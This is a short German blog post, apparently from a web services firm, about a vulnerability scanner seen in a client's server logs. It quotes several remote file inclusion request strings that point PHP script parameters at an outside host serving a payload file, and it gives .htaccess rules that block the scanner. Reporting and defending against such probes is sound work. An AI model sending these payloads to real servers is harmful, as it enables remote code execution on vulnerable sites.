English Version here.
Heute haben wir in den Logfiles eines unserer Kunden Hunderte Einträge eines Useragenten "Morfeus Fucking Scanner" entdeckt. Der hat zwischen 04:33 und 04:45 Uhr ca. 400 verschiedene Files versucht aufzurufen, um Sicherheitslücken oder alte (oder auch vergessene) Skripts auf dem Server zu finden.
Das scheint ein automatisches Skript zu sein, das einfach auf Verdacht Hunderte Dateinamen aufruft und guckt, ob etwas antwortet. Einige Beispiele:
/portal/index.php?file_name[]=http://203.198.68.236/~lisir/M.txt?&/
/board/naboard_pnr.php?skin=http://203.198.68.236/~lisir/M.txt?&/
/revista/estilo/discreet/index.php?adodb=http://203.198.68.236/~lisir/M.txt?&/
/components/com_performs/performs.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/
/redaxo/include/addons/simple_user/pages/index.inc.php?REX[INCLUDE_PATH]=http://203.198.68.236/~lisir/M.txt?&/
/jetboxincludes/phpdig/includes/config.php?relative_script_path=http://203.198.68.236/~lisir/M.txt?&/
/phpnuke/modules/vWar_Account/includes/functions_common.php?vwar_root2=http://203.198.68.236/~lisir/M.txt?&/

Die "Angriffe" kamen alle von der IP: 208.67.180.44 und wer den Useragenten aussperren will: HTTP_USER_AGENT:
Morfeus Fucking Scanner
Mit diesen Zeilen in der .htaccess lässt sich der Scanner vom Server aussperren:
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
Wenn dir dieser Artikel geholfen hat, dann darfst du gerne
ein paar Cent in unsere Kaffeekasse spenden.
Kommentare
Sat, 23.08.2008 16:57
In der Zwischenzeit hat sich hier ja doch einiges getan. [...]
Mon, 28.07.2008 14:13
Ich habe mir mal die Testversion von Office 2007 angesehen, [...]
Mon, 28.07.2008 01:52
also ähm bei mir funzt daas trotzdem ned...wenn ich bei [...]
Wed, 23.07.2008 13:13
Hi, wir setzen auch die Shopsoftware von JTL bei [...]
Sat, 19.07.2008 00:08
Na so der Sonderpreis ist das nicht, vergleiche doch mal die [...]